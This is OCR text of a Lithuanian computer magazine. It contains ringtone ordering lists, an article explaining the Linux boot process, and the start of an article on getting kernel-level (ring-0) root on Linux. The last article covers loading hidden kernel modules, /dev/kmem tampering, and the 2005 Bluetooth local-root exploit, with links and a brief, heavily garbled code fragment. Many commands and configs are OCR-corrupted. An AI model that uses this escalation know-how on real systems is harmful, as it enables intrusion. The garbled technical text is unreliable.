WE WISH YOU A MERRY CHRISTMAS 5410092118 


SLADE bvabi Christmas Everybody 5410091243 


V LESU RODILAS JOLOCHKA 5410092113 


JOHN LENNON - Happy X-mas 5410092117 


„MELODIJŲ TOP 10 


1 CRAZY FROG - Axel F 5410031805 
1 BENASSI BROS - Every Single Day.—=| | 5410092042 
1 MICHAIL KRUG - Vladimirskiį centrai 5410091226 
| 5410092101 
4 FAKTOR-2 - Krasavica 5410091605 
6 SERIOGA - Chiomnyj bumer=—=| | | | 5410091061 
7 YVA - Paukštelis 5410091534 
; 5410091910 


+ ais IR TARAKONAI 5410091062 


TV šou KELIAS I ŽVAIGŽDES 


ANDRIUS - Mes vyrai 5410092010 
ANDRIUS - Nesok sau rožės prie kasų 5410092090 
DANGĖ - Aš atėjau ir išeinu 5410092098 
DANGE 4 DONATA - Blogoms mergaitėms viskas = 5410092018 
DONATA - Paparapa 5410092084 
MAROLDAS - Ramunė balta 5410092093 
MINO 4 VILIJA + Vivo per lei 5410092094 
RAKETA - | klubą 5410092059 
RAKETA - Musų tai neliečia 5410091966 
RULĖ - Pabučiuok, argi gaila 5410092104 
RULĖ - Pažiūrėk | mane pupite 5410092080 
SIGITĄ -» Dar ne kartą 5410092105 
SIGITA » Spalvos 5410092081 
VILIJA - Kvailys 5410092088 
VILIJA + Spjaudau ir gaudau 5410091992 
VUDIS - Du kart du 5410092061 
vuDIs 5410092106 
VuDIS 5410092082 


Kur bebutum tu 
Laimin 


* TV šou DANGUS * 


DANGAUS ŽVAIGŽDĖS - Dangus 
VAIDAS + Myliu 5410092060 
RASA - Medžiai be lapų 5410092079 


"POPULIARIOS ', 


ANASTACIA - Welcome To My Truth 5410091377 
BASEMENT JAXX - Good Luck 5410091378 
BENNY BENASSI - Illusion 5410091379 
808 MARLEY - No woman no cry. 5410091380 
BON JOVI - Its My Life 5410091381 
BRITNEY SPEARS - Overprotected 5410091382 
EVANESCENCE + My Immortal 5410091383 
EROS RAMAZZOTTI - La Nostra Vita 5410092109 
AC-DC + Thunderstruck 5410091465 
ATB - Let You Go 5410091466 
AVENTURA » Obsesion 5410091467 
SUGABABES - Push The Button 5410092069 
TATŲ - All About us 5410092070 
DAVID GUETTA - In Love with My Myself 5410092116 
ALANIS MORISSETTE - Crazy 5410092095 
RAMMSTEIN - Benzin 5410092078 
AMY DIAMOND - Welcome To The City 5410092041 
MM - The Wings Of A Butterfly 5410091980 
REFLEX - Tancy 5410091988 
THE RASMUS - No Fear 5410091960 
JUANES - La Camisa Negra 5410091964 
GLOBAL DEEJAYS - What a Feeling 5410091893 
GROOVE COVERAGE - Poison 5410091894 
GWEN STEFANI - Hollaback Girl 5410091895 
JMMY SOMMERVILLE -I Will Always Bo Around 5410091897 
DEPECHE MODE - Precious 5410091978 
GORILLAZ - Dare 5410091979 
SEPTEMBER - Satellitos 5410091953 
WUSTAFA SANDAL - All My Lito 5410091901 
SMAKIRA - La Tortura 5410091887 
ARASH - Boro boro 5410091840 
VANILLA NA Cool Vibes 5410091808 


„LIETUVISKOS *, 


BAVARIJA + Be nbų 5410092091 
DNSA - Don't Let Me Die 5410092067 
SKAMP - L'attente 5410092033 
346 SINDIKATAS - Pasaka apie du brolius 5410092036 
DELFINAI - Ačiū tau 5410092043 
NEO » Tavo delne 5410092049 
1 DONSKOVAS * Ar vien tik dėl to 5410092051 
WILANA + Mylėk karštai 5410092111 
ŽILVINAS ŽVAGULIS - Laisvo oro direktorius 5410091993 
ZAS - Aš ne toks 5410091994 
WA » Būki su manim 5410091948 
TABU - Maža širdelė 5410091954 
22ORDANA - Nebenoriu laukti 5410091882 
KENTAS - Jammin 5410091884 
AMBERLIFE » Tako Me 5410091855 
JURGA - Nebijok 5410091856 
SXAMP - Under the Sun 5410091857 
14 DANGUJE - 9 danguj 5410092107 
TAJA - Saulė 5410091990 
E KUČINSKAS - Lai, lai angelai 5410091760 
BAVARIJA - Saulė, saulė danguje 5410092073 
MANTAS - Gyvenam kartą 5410092074 
SELTONA - Mariana 5410092092 
ATLANTA - Žalios mėtos 5410092012 
JURGA + Saulė vandeny 5410092056 
KASTANEDA - Argentina 5410092057 
POLIKLINIKA + Marijonai, kodėl tu užkimai? 5410092054 
WONOTONINE POLUIFONINE WAPIGPRS 
1 Rašyk žinutę »u M Ir kodu 1. Rašyk Sms su: P ir kodu 
2. M541009 dra 

1 Siųsk numeriu: 1390 2 Siųsk numeriu 1390“ 
MELODIJOS MONOTONINĖS: NOKIA 2 Lt 


5410092017 


W5410001620 


1 Rašyk žinutę su kodu: P 


Dr W5410091 


2 Siųsk numeriu: 1390 


PIZZA MAGNATE 


| Arau Ž3 


15416081998 


Ekonominė strategija 
tavo telefone! Galite 
išbandyti savo jėgas 
kurdami picerijos versią, 
samdydami darbuotojus. 
išradinėdami naujas 
picas Ir dar daug daugiau 
šitame nuostabiame 
žaidime! 


1 Rašyk žinutę su kodu: Pys 


W5410091055 


W5410091047 


W3410091034 


p 
+ 


W5416091063 


LOVE 


W5410091051 


REAL BILLIARDS 


15410091165 
Biliardas - tai puikus 
laiko praleidimas, tiek 


| vienam, tiek su draugais 


Dabar šis nuostabus 
laiko praleidimo būdas 


| gali būti su jumis visada 
| kad ir kur bebutumėte 


15 žaidimo versijų 
viename kaip pvz 

6 kamuoliukai, rusiškas 
biliardas, piramidė ir 
daugelis kitų 


15416001096, draugu 


2. Jei priklausai OMNITEL ar BITĖ, siųsk numeriu: 1390 
Jei priklausai TELEĖ2, siųsk numeriu 1399 


ji — 


+541003109 


15410081106 
Tai tikras futbolas tavo 
mobiliajame telefone, 
geriausių sarašas, Jums 
reiks kopti karjeros 
laiptais, galimybė 
Išsaugoti geriausiu 
smigių vaizdo įrašus 
3 žaidimo galimybės 
1) Atsitiktinis žaidimas 
su įvairiomis 
komandomis 
2) Žaidimas pasirinkus 
savo Ir priešo komanda 
3) Ir čempionatas 


370699XX XXX 


WAP GPRS 


SPALVOTI PAVEIKSLĖLIAI 


F5410092076 


F5410092015 


F5410092053 


F5410092067 


F5410092073 


F5410091867 


F5410091016 


F5410091028 


s 
F5410091558 


„AP 


F5410091631 


F5410091230 


k 


F5410091166 


F5410091173 


F5410091474 


5 


F5410091787 


d 


F5410091690 


F5410091168 
F5410091438 
F5410091693 
F5410091139 


V. 


F5410091243 


1 - 


F5410091877 
Rašyk žinutę su kodu 


Draugui PE ) 


Siųsk numeriu: 1390 


F5410091674 


F5410091396 


XXX 


MOTOROLA 


MELODIJOS POLIFONINĖS: KOMA 


EMEN „rin 


WAP/'GPRS 164 74 


Ta66. 1410 


O Ž. 


02 


F5410092054 


"=" 17 


s- 


= 


F5410092070 


F5410092058 


F5410092038 
m! 


a 


- 
F5410092075 F5410092078 


F5410091321 F5410091432 


2- 


F5410091024 F5410091250 


F5410091285 F5410091240 


sa 


FS5410091237 F5410091344 


F5410091462 F5410091269 


F5410091716 
NOKIA, SIEMENS 


0 D700 V100. P 
| Uk5) SONY-ERICSSON: |! 


C05. F62 SL65 MS5 F62. SL65, M55. 
C60. CX66, Cx76 MC60, Cx68, Cx70. 
Pa SKĖS $55 SU54 M465 565 S54 SLS4 


S 


W4410091025 


D SIEMENS: At4 
JOG, M53 M75 ME 565 


) MOTOROLA MOT CM SONY-ERICSSON 


2650. 2100, 3105. 3108, 
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Pažink savo OS 


AR KADA NORS SUSIMĄSTYDAVAI APIE TAI, 
KAS KROVIMOSI METU VYKSTA SU TAVO 
MĖGIAMU PINGVINU? KOKIŲ VEIKSMŲ SIS- 
TEMA IMASI TAM, KAD TU BE PAPILDOMŲ 
PASTANGŲ GALĖTUM ŽIŪRĖTI FILMUS, 
KLAUSYTIS MUZIKOS, BENDRAUTI PER IRC 
IR APSKRITAI DIRBTI SU OPERACINE SIS- 
TEMA? ATSAKYMUS Į ŠIUOS KLAUSIMUS 
TU RASI ŠIAME STRAIPSNYJE. 


(1 


Išsamiai apie „Linux“ 


krovimosi procesą 
[Prologas] Kaip žinia, operacinės 
sistemos krovimosi procesas prasi 
deda nuo užkrovėjo (lilo arba grub), 
kuriam valdymą perduoda motininės plokštės BIOS. Užkro- 
vėjas savo ruožtu į atmintį užkrauna branduolio atvaizdą, ku- 
ris yra /boot kataloge, ir suteikia jam visas teises. Branduo- 
lys atlieka daugybę testų ir inicializacijų, aktyvuoja tvarkykles 
ir paleidžia init procesą (PID = 1). Po to branduolys jau ne- 
gali kontroliuoti tolimesnio krovimosi, todėl visa atsakomybė 
gula ant init pečių. 


[„Init“: šeimos galva] Init užduotis — paleisti startinius sknptus, ku- 
rie kaip tik ir atsako už tolimesnius OS krovimo veiksmus, failų siste 
mu patikrinimus, tinklo sąsajų aktyvavimus, demonų paleidimus 
ir t.t. Gavęs absoliučia valdžią, init visų pirma nuskaito savo kon- 
figą /etc/inittab, kad galėtų sužinoti paleidimo lygį pagal nutylėjimą ir 
tai, kokiems būtent skriptams derėtų patikėti užkrovimo valdymą. 


[Init paleidimo lygiai:] 

1. Įjungimas. 

2. Vieno vartotojo režimas (single user mode). 

3. Daugiavartotojiškas režimas (multi user mode) be prisijungi- 
mo prie tinklo. 

4. Daugiavartotojiškas režimas. 

5. Nenaudojamas. 

7. Daugiavartotojiškas režimas plius X-Window paleidimas 

8. Perkrovimas. 

Pavyzdžiui, žvilgtelėsime į bylą /etc/inittab iš Slackware 10.1. 
Eilutė „id:3:initdefault:“ nurodo trečiąjį paleidimo lygį. Kitas iš 
eilės įrašas „si:S:sysinit:/etc/rc.d/rc.S“ reiškia, kad skriptas /etc/ 
re.d/rc.S turi būti kraunamas pirmas nepriklausomai nuo palei- 
dimo lygio. Toliau tekste galima surasti eilutę „rc:2345:wait:/ 
etc/rc.d/rc.M“, kuri byloja apie tai, Kad visiems lygiams, nuo 
antrojo iki penktojo, reikėtų paleisti skriptą „/etc/rc.d/rc.M“. 


[SystemV vs BSD] Išskiriami du paleidimo skriptų tipai: Sys- 
temV ir BSD. Pirmieji buvo naudojami originaliame UNIX, o ant- 
rieji - BSD šeimos sistemose. Skirtumai tarp jų yra pakankamai 
niu, ji galima kur kas smarkiau konfigūruoti, o BSD skriptai išsi- 
skiria savo paprastumu (nors šiuolaikiniai BSD paleidimo skriptai 
savo lankstumu ir konfigūravimo patogumu SystemV skriptus net 
lenkia). Iš pradžių (386BSD atsiradimo aušroje) BSD paleidimo 
skriptai buvo šešios bylos (/etc/rc.0 — rc.6), kiekviena kurių buvo 
atsakinga už vieno iš septynių paleidimo lygių inicializaciją. Pradi- 
ne inicializacija užsiiminėjo skriptas /etc/rc.sysinit (arba tiesiog / 
etc/sysinit). Siuo metu tokią (šiek tiek išdarkytu pavidalu) užkrovi- 
mo schemą galima sutikti Linux sistemos Slackware ir CRUX di- 
stributyvuose. Siuolaikinėse BSD sistemose naudojami kiti skrip- 
tai, kurie iš savo pirmtakų paveldėjo tik vieną pagrindinę idėją. 
Bendru pavidalu šie skriptai atrodo štai taip: 
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Kaip matome, init yra visų procesų tevas 


(U6 not set to O Or 6) 


4 Default runlevel. 
id:3:initdetault: 


4 Sųstem initialization iruns when 


si:S:sysinit:/etc/rc.d/rc.S 


system boots). 


4 Script to run when going single user (runlevel 1). 
su:1S:wuait:/etc/rCc.d/rC „K 


4 Script to run when going Multi user. 
rc:2345:wait: /etC/rC .d/rc.M 


* Khat to do at the "Three Finger Salutė“. 


ca:ictrialtde1l:/sbin/shutdowun -t5 -F nOw 


4 Runievel O halts the System. 
lOo:O:wait:/etc/rc .d/rc.ū 


4 Runlevel 6 rebocots the sustem. 
Iš:šiwalt:/etC/rE .d/rC.6 


'etc/inittab iš Slackware 10.1 


[BSD inicializacijos schema| 


/etc/sysinit — pradinės inicializacijos skriptas 

/etc/rc — atsako už 2-5 lygio inicializaciją 
/etc/rc.shutdown — atsako už O, 1 ir 6 lygių inicializaciją 
/etc/rc.conf — konfigūracinė byla 

/etc/rc.local — vartotojo komandų paleidimas 


Keičiant konfiga, galima kontroliuoti servisų paleidimą, keisti 
šriftus ir klaviatūros išdėstymus. 

Priešingai nei monolitiniai BSD skriptai, SystemV skriptai tai iš 
tiesų daugybė skirtingų skriptų, kiekvieno kurių užduotis  įvyk- 
dyti vieną inicializacijos žingsnį (pavyzdžiui, prijungti swap, paleisti 
sendmail, nurodyti šriftą). Visi skriptai susitelkę /etc/rc.d/init.d 
kataloge, o be jo kataloge /etc/rc.d yra dar aštuoni katalogai: 
rcO.d-rc6.d ir resysinit.d. Jų pavadinimai atitinka paleidimo ly- 
gius. Kiekviename iš jų sukuriamos simbolinės nuorodos, rodan- 
čios į /etc/rc.d/init.d katalogo skriptus. Nuorodos pavadinimas 
gali prasidėti S (paleisti servisą) arba K (sustabdyti servisą) raide. 
Po to eina du skaičiai, reiškiantys tvarką, kuria turės būti palei- 
džiami skriptai. Pavyzdžiui, jeigu rc3.d kataloge bus nuorodos 
S10sysklogd ir S15cron, tai reiškia, kad trečiame paleidimo lygy- 
je derėtų iš pradžių įvykdyti skripta /etc/rc.d/init.d/syslogd, o po to 
/etc/rc.d/init.d/cron. Kiekvienam iš jų bus perduotas parametras 
start. Gana dažnai sistemose su SystemV inicializacijos stiliumi 
yra katalogas /etc/sysconfig su konfigūracinėmis bylomis, su ku- 
riomis galima daryti įtaką krovimosi procesui. 


[Ką mums ruošia skriptai] Prieš pratęsdamas mūsų epopėją, 
norėčiau tavo dėmesį atkreipti į vieną svarbią detalę. Kadangi 
startiniai skriptai yra komandų interpretatoriaus skriptai, tai reiš- 
kia, kad jau krovimosi metu mums prireikia bash'0 — tai pirma. 
Antra, skriptai negali apsieiti tik su įmontuotomis bash priemo- 
nėmis, todėl jiems reikia standartinių komandų, t.y.: cat, echo, 
hostname, rm, uname. Visos šios bazinės programos bei dau- 
gelis kitų yra pakete coreutils. Taip pat norint pervesti sistemą | 
veikiančią būseną, skriptai negali apseiti be kitų tarnybinių įran- 
kių (hwclock, mount, swapon ir t.t.). Tokie įrankiai įeina į pake- 
to util-linux sudėtį, kuris savyje apjungia netvarkinga įvairių tar- 
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pusavyje nesusijusių pro- 


Tu gali brarkiuoliui Nurodyti vote mit P Ė 
krauti bet kokį kita procesą, Uesiog gramų mišinį (būtent Jame 
aprašydamas paramettą init /ko yra more ir cal) Čia dar pri- 
basi programos. Pavyzdžiui, mit ; S pa 
birbash. dėk teksto apdorojimo pro- 
gramas sed bei awk ir su- 
Būtent dėl to, kad į Unux distributy s F (ART <= 
vs be branduolio nina cleaiggybe Ivas prasi, kad Jau inicializacijos 
rios laisvos programinės Įrangos, etape iškyla daugelio stan- 
kuri platinama pagal GPL icenciją, dartini rogram oreikis. 
Linux derėtų vadinti GNU/Unux, 5 ų P gra u ka 


Beje, visos jos turi būti ka- 
taloguose /bin ir /sbin, kadangi failų sistema, kurioje yra /usr, 
gali būti neprimontuota pradiniame užkrovimo etape. 


[Inicializacijos magija] Metas pereiti prie paties krovimosi pro- 
ceso aprašymo. Kad nieko neįžeistume, kaip pavyzdį paimkime 
neutralaus LFS distributywo skriptus :). Jo startiniai skriptai labai 
paprasti ir priskiriami SystemV klasei. Taigi pabandykime logiškai 
pagalvoti, ką reikia padaryti pradinėje inicializacijos stadijoje (to- 
je, kuri nepriklauso nuo paleidimo lygio). O padaryti reikia štai ką 
(pagal prioritetą): 

1. Primontuoti branduolines failų sistemas /proc ir /sys, nes 
priešingu atveju be jų mažai kas veiks. 

2. Inicializuoti udev sistemą, kuri užsiima /dev kataloge esančių 
elementų sukūrimu. 

3. Prijungti swap, nes kaip gi mes be jo. 

4. Užkrauti modulius, kadangi siderinamumas su kai kuriais FS 


| | |-- S10sysklogd > „./init.d/sysklagd 
| | -- S20netuork - „„/init.d/netuork 
| |-- rcb.d 
| | |-- K8Onetuork - „„sinit.d/netuork 
| | |-- K90sysklogd - ../init.d/sysklogd 
| | |-- S50hotplug -> „„sinit.d/hotplug 
| | |-- S60sendsignals -> ..init.d/sendsignals 
| | |-- S?0mountfs - „„sinit.d/mountfs 
| | |-- S8B0Osuap - „„sinit.d/suap 
| | |-- S90localnet - ../init.d/localnet 
| | -- S99reboot - „.sinit.dsreboot 
| -- resysinit.d 
| |-- S00mountkernfs -> ..sinit.d/mountkernfs 
| |-- S05modules - ..sinit.d/modules 
| |-- S10udev - „„init.d/udeu 
| |-- S20suap - „./init.d/suap 
| |-- S30checkfs - „.sinit.d/checkfs 
| |-- S40mountfs - „„sinit.d/mountfs 
| |-- S50cleanfs - „./init.d/cleanfs 
| |-- S55hotplug -> .„sinit.d/hotplug 
| |-- S60setclock - „.init.d/setclock 
| |-- S70console - „./init.d/console 
| -- S80localnet - ..sinit.d/localnet 
-- sųysconf ią 
|-- Console 
|-- createfilės 
|-- modules 
|-- netuork-devices 
| |-- ifdown 
| |-- ifup 
| -- services 
| -- static 
|-- rc 
-- Sųysk logd 
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Maždaug taip atrodo SystemV skriptu medis 


gali būti moduliuose — tai reikia padaryti iki failų sistemu pa- 
tikrinimo ir montavimo. 

5. Patikrinti failų sistemas, ar jose nėra klaidų. 

6. Primontuoti visas lokalias FS. 

7. Išvalyti /tmp, /var/run ir į juos panašius katalogus, kad juose 
nebūtų laikinų bylų. 

8. Nustatyti sisteminį laiką. 

9. Nustatyti reikiamą Kkonsolinį šriftą ir klaviatūros išdėstymą. 
10. Aktyvuoti grįžtamojo ryšio (Ioopback) sąsają. 


O dabar pažiūrėkime, kaip visa tai atrodo startiniuose skriptuose. 
Jeigu spreęstume pagal LFS bylą /etc/inittab, tai pradinei iniciali- 
zacijai reikia paleisti skriptą /etc/rc.d/init.d/rc su parametru sysi- 
nit (si::sysinit:/etc/rc.d/init.d/rc sysinit). Šis skriptas savo ruožtu 
pereina į katalogą /etc/rc.d/rcsysinit.d ir paleidžia šiame kataloge 
esančius skriptus, kurie iš tikrųjų yra nuorodos. Jie bus paleidžia- 
mi tokia tvarka (ši tvarka gali nesutapti su mano pasiūlyta): 
SOOmountkernfs — branduolinių FS montavimas. Gavęs start 
parametrą, skriptas patikrina, ar nesumontuota /proc, ir neigia- 
mo atsakymo atveju ją prijungia su komanda „mount -n /proc". 
Po to skriptas išsiaiškina, ar branduolys suderinamas su /sys 
failų sistema ir ją sumontuoja (Mount -nN /sys). 

S0O5modules - modulių užkrovimas. Ar branduolys suderinamas 
su moduliais, skriptas sužino pagal bylas /proc/ksyms ir /proc/mo- 
dules (jos turi egzistuoti). Toliau nuskaitoma byla /etc/sysconfig/ 
modules, kurioje aprašyti modulių pavadinimai ir argumentai. Kiek- 
vienam iš modulių panaudojama komanda modprobe. 
S10udev — udev inicializacija. Patikrinama, ar sumontuo- 
ta /sys ir ar egzistuoja byla /sbin/udev. Po to /dev kataloge 
sukuriama keletas naudingų įrašų (pavyzdžiui, „In Ss /proc/ 
self/fd /dev/fd“). Po udev aktyvavimo patikrinimo prie /dev 
katalogo primontuojama virtuali FS (mount -n -t ramfs ramfs 
/dev). To reikia tam, kad kataloge esantys įrašai būtų kuria- 
mi ne fiziniame diske, o operatyvinėje atmintyje. Komanda 
„echo /sbin/udevsend > /proc/sys/kernel/hotplug“ branduo- 
liui perduodama informacija, kad jeigu prie kompiuterio buvo 
prijungtas naujas įrenginys, apie tai tuojau pat turi būti pra- 
nešta udev sistemai, kad ji šiam įrenginiui galėtų sukurti 
naują bylą. Viskas, dabar su komanda udevstart galima pa- 
leisti udev. 

S20swap — swap prijungimas. Čia viskas labai paprasta: viena 
komanda „swapon -a“, kuri primontuoja visas turimas swap 
particijas. 


S30checkfs — failų sistemų patikrinimas. Bet kurios failų sis- 
temos patikrinimas atliekamas su komanda fsck, kun, priklau- 
somai nuo FS tipo, paleidžia kitą patikrinimo programą, kurios 
pavadinimas — fsck.fs tipas (pavyzdžiui, fsck.ext2 arba fsck.rėi- 
serfs). Paprastai tokie įrankiai platinami ext2progs, reiserfsprogs 
ir į juos panašiuose paketuose. Dabar pabandykime išsiaiškin- 
ti, kaip skriptas checkfs atlieka patikrinimą. Viskas prasideda 
nuo bylos /fastboot egzistavimo patvirtinimo (kai kuriuose di- 
stributyvuose ji gali vadintis /etc/fastboot). Jei tokia byla yra, 
reiškia patikrinimo atlikti nereikia, todėl ją pamatęs skriptas 
tuojau pat užbaigia savo darbą. Toliau skriptas šakninę FS per- 
montuoja read-only režimu (mount -n -o remount.ro /), kad 
galėtų užtikrinti jos patikrinimo galimybę. Norint sužinoti, ar ne- 
reikia atlikti priverstinio visų FS patikrinimo (net jeigu jos buvo 
korektiškai išmontuotos), skriptas ieško bylos /forcefsck (kai ku- 


riuose distributyvuose ji vadinasi /etc/forcefsck). Jeigu tokios bylos 
nėra, atliekama komanda „fsck -a -A -C -T“, kuri patikrina 
visas /etc/fstab byloje aprašytas failų sistemas. 


S40mountfs -— failų sistemų montavimas. Po to, kai buvo už- 
baigtas patikrinimas, galima šakninę FS sumontuoti atgal į skai- 
tymo/rašymo režimą, ką skriptas ir padaro su komanda „mount 
-n -o remount,mw /“. Toliau pašalinamos jau nereikalingos by- 
los /fastboot ir /forcefsck. Sukuriama švari byla /etc/mtab ir į ją 
su komandomis „mount -f /“, „mount -f /proc“ ir „mount -f / 
sys“ surašoma informacija apie jau sumontuotas failų siste- 
mas (V, /proc ir /sys). To reikia, kad kai kurios programos dirbtų 
teisingai. Galų gale su komanda „mount -a -O0 no netdev“ su- 
montuojamos kitos failų sistemos. Atkreipk dėmesį į paskutinę 
opciją: ji nurodo komandai mount neprijungti tinklo FS, kadangi 
tinklas dar neveikia. 

S50Ocleanfs — katalogų išvalymas. Šiuo atveju išvalomi katalo- 
gai /tmp, /var/lock ir var/run. Sukuriama tuščia byla /var/run/utmp, 
0 po to /etc/sysconfig/createfiles konfige išvardintos bylos. 
S60setclock sisteminio laiko nustatymas. Nuskaitoma by- 
la „/etc/sysconfig/clock“ ir, jeigu kintamojo $UTC reikšmė yra 
true (tai reiškia, kad CMOS laikrodis veikia Grinvičo laiko juos- 
toje), įvykdoma komanda hwclock -—-hctosys --utc, 0 priešin- 
gu atveju — komanda hwclock -—-hctosys -—localtime. 
S70Oconsole reikiamo šrifto ir klaviatūros išdėstymo nustaty- 
mas. Viskas, ko reikia šiam veiksmui atlikti, paprastai yra pake- 
te kbd. Šriftas nustatomas su komanda „setfont šrifto pavadi- 
nimas“, o klaviatūros išdėstymas — su komanda „loadkeys iš- 
dėstymas“. Prieinamus šriftus ir išdėstymus galima rasti kata- 
loguose „/usr/share/kbd/consolefonts“ ir „/usr/share/kbd/key- 
maps“. Taip pat korektiškam pseudografikos atvaizdavimui gali 
prireikti užkrauti „simbolių kortelę“ (consoletrans). 
S80localnet — grįžtamojo ryšio (loopback) sąsaja Skirta loka- 
liam tinklo servisų panaudojimui. Jo aktyvavimui skriptas įvykdo 
viso labo vieną komanda „ifconfig lo 127.0.0.1“. 


Tuo pradinė inicializacija baigiasi. /nit demonas, iš /etc/init- 
tab bylos nuskaitęs eilutę „I3:3:wait:/etc/rc.d/init.d/rc 3“, pa- 
klūsta ir įvykdo šią komandą. Tuomet skriptas /etc/rc.d/init.d/ 
rc pereina į katalogą /etc/rc.d/rc3.d, o inicializacijos proce- 


etc/rc.d'Init.d/mountfs skriptas 


sas tęsiasi. Aktyvuojamas tinklas, paleidžiami syslog, cron, 
at ir kiti demonai. 

Pasibaigus inicializacijos etapui, init nuskaito paskutinės /etc/ 
inittab eilutes 1:2345:respawn:/sbin/agetty -I 1033(K' tty1 
9600. Tai reiškia, jog pirmame terminale (tty1) reikia paleisti 
agetty. Agetty užduotis — prisijungti prie reikiamo terminalo ir 
paleisti programą /bin/login, kuri į ekraną išveda kvietimą (by- 
la /etc/issue) ir laukia vartotojo vardo bei slaptažodžio įvedi- 
mo. Įrankis /ogin palygina įvestą vartotojo vardą bei slaptažodį 
su /etc/shadow baze ir paleidžia shellą, aprašytą paskutinia- 
me prisijungusio vartotojo /etc/passwd bylos stulpelyje. 


[Standartinė C kalbos biblioteka] 
Apie tai, kad „Unix ir C — amžini draugai“, žino kiekvienas 
uniksoidas. Būtent todėl galima manyti, kad tiek branduolys, 
tiek ir programinė aplinka sukurti būtent su C. Vis dėlto pati 
kalba nesuteikia jokių įmontuotų priemonių, skirtų išvedimui 
į ekraną, darbui su bylomis, atmintimi ir kitais resursais. Vi- 
sus šiuos veiksmus turi atlikti išorinė biblioteka. Tokia biblio- 
teka yra bet kurioje Unix sistemoje ir ji vadinasi LibC (dabar 
naudojama GNU šios bibliotekos versija — glibc). Su ja su- 
sieta (linked) kiekviena programa, kuo galima lengvai įsitikin- 
ti užsiundžius /Idd ant bet kokios paleidžiamos programos iš / 
bin arba /usr/bin katalogo. Tu pamatysi išganingąją eilutę 
„libc.s0.6 => /lib/libc.so.6 (Oxb7eb2000)“. Pati biblioteka 
yra kataloge /lib ir vadinasi Iibc.so.6 (skaičius 6 reiškia, kad ji 
suderinama su šešta originalaus libc versija). Siekiant suma- 
žinti bibliotekos atmintyje užimamą vietą, ji buvo suskaidyta į 
keletą dalių ir rečiau naudojamos funkcijos buvo perkeltos į 
kitas bibliotekas. Pavyzdžiui, libm — matematinių funkcijų 
biblioteka, //bd! — bibliotekų užkrovimo veikimo metu biblio- 
teka, libcrypt — kriptografinės funkcijos. Kartu su šia biblio- 
teka pateikiamas ir dinaminis užkroviklis (Linux atveju tai yra 
Id-linux.so.2). Paleidus programą, jis pirmas atsiduria atmin- 
tyje ir užkrauna visas programai reikalingas bibliotekas, kurių 
buvimo vietą nustato byla /etc/Id.so.cache. Savo ruožtu, ši 
byla sukuriama su įrankiu Idconfig, kuris nuskaito /etc/ 
Id.so.conf konfigą. Beje, tokie populiarūs įrankiai, kaip Idd, 
iconv ir locale taip pat yra glibc paketo dalis. 


Serverio konfigūravimo vedlys. DHCP serveris kol kas dar neįdiegtas 
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Nulinio žiedo užgrobimas 


NULINIS ŽIEDAS SUTEIKIA GALIMYBĘ PIL- 
NAI VALDYTI PROCESORIŲ, TADA GALIMA 
SU JUO DARYTI VISKĄ, KO TIK ĮSIGEISI. ŠIA- 
ME LYGYJE VYKDOMAS OPERACINĖS SIS- 
TEMOS KODAS, KRAUNAMI BRANDUOLIO 
MODULIAI IR KITI ZEMO LYGIO KOMPONEN- 
TAI. MANOMA, KAD LINUX PATIKIMIAU SAU- 
GO NULINĮ ŽIEDĄ NUO HAKERIŲ ĮSIVERŽI- 
MO, TAČIAU TAIP NĖRA. PASTARAISIAIS ME- 
TAIS APTIKTA DAUGYBĖ SKYLIŲ, IŠ KURIŲ 
KITOS VIS DAR NEUŽTAISYTOS. 


Pavergiam ringO „Linux“ sistemoje 

[Įvadas] Ka galima padaryti iš taikomojo (application) lygio? 
Įvykdyti neprivilegijuotą procesoriaus komanda, kreiptis į varto- 
tojo atminties srities ląstelę, panaudoti sisteminį iškvietimą. 
Įrašyti i įvedimo/išvedimo jungtis, perprogramuoti BIOS, mas- 
kuoti procesus ir tinklo susijungimus galima tik iš branduolinio 
lygio. Visi hakeriai siekia šio šventojo Gralio, tačiau ne visi į| 
suranda. Link jo veda daug kelių, todėl aš papasakosiu tik apie 
įdomiausius iš jų. 


[ĮSantykinai sąžiningi laužimo būdai] Su root teisėmis pa 
tekti į branduolį nėra problema. Pavyzdžiui, galima parašyti 
savo LKM (Loadable Kernel Module užkraunamas bran- 
duolio modulis) ir užkrauti jį su komanda insmod. LKM mo- 
duliai rašomi labai paprastai (tai ne Windows tvarkyklės!). 
Paruoštų modulių pavyzdžių galima rasti mūsų žurnale spaus- 
dintame straipsnyje „Pažaiskime su tuksu slėpynių“, ten taip 
pat pasakojama, kaip juos užmaskuoti nuo budraus admi 
nistratoriaus žvilgsnio. 

Kitas variantas. Branduolys montuoja du pseudojrenginius: 
/dev/mem (fizinė atmintis prieš virtualią transliaciją) ir /dev 
kmem (fizinė atmintis po virtualios transliacijos). Root var 
du mes galime manipuliuoti branduolio kodu ir duomeni 
mis. Visas klausimas tik tame, kaip gauti patį root'ą. Lega- 
liu būdu to niekaip negalima padaryti! Linux turi ištisą sau 
gumo priemonių kompleksą (trūksta tik apsauginių su ne- 
peršaunamomis liemenėmis ir mašinų su švyturėliais), ta- 
čiau apsaugos sistemoje yra daugybė skylių, dėl kurių ji yra 
panašesnė į kiaurasamtį. Štai šiomis skylėmis mes ir pasi- 
naudosime. 


ĮSkylutė Mėlynajame Dantyje] Mažyte Bluetooth mikrosche- 
ma naudoja sudėtingą ryšio protokolą, kuris palaikomas ganė- 
tinai skausmingai. Praktiškai nė vienam tyrinėtojų kolektyvui ne 
pavyko išvengti naujų skylių atsiradimo, per kurias tilptų net ir 
dramblys. Na, jeigu jau ne dramblys, tai bent jau sliekas! Linux 
taip pat netapo išimtimi. 2005 metų balandį atsirado praneši- 
mas apie skylę, o po to buvo parašytas Kernel Bluetooth Local 
Root Exploit, veikiantis su 2.6.4-52, 2.6.11 ir kai kuriomis 
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ELF byla ir jos turinys 


kitomis branduolių versijomis. Kūrėjų klaida buvo tame, kad jie 
Mėlynojo Danties soketo duomenų struktūras išsaugojo varto- 
tojo atminties srityje, tuo pačiu suteikdami puikias galimybes 
visų laukų modifikavimui. Vienu iš tokių laukų pasirodė besanti 
rodyklė į kodą, kuris iškviečiamas iš branduolio lygio. Paprastai 
ji rodo į Mėlynojo Danties palaikymo bibliotekas, tačiau mums 
nieko nereiškia ją nukreipti į shell kodą! 
Žemiau pateiktas esminis eksploito, suteikiančio root teises iš 
vartotojo konteksto, fragmentas. Originalų išeities tekstą gali- 
ma rasti adresu home.paf.net/gobaiashi/ong bak.c, o čia yra 
kopija: www.securiteam.com/exploits/5KPOFOAFFO.html. 
Esminis eksploito, suteikiančio „root“ teises iš vartotojo kon- 
teksto, fragmentas 

I ((imp  klogetl(043, bul, 1700))  -1) 
( 
check — stistr(buf, "e0t: "); 
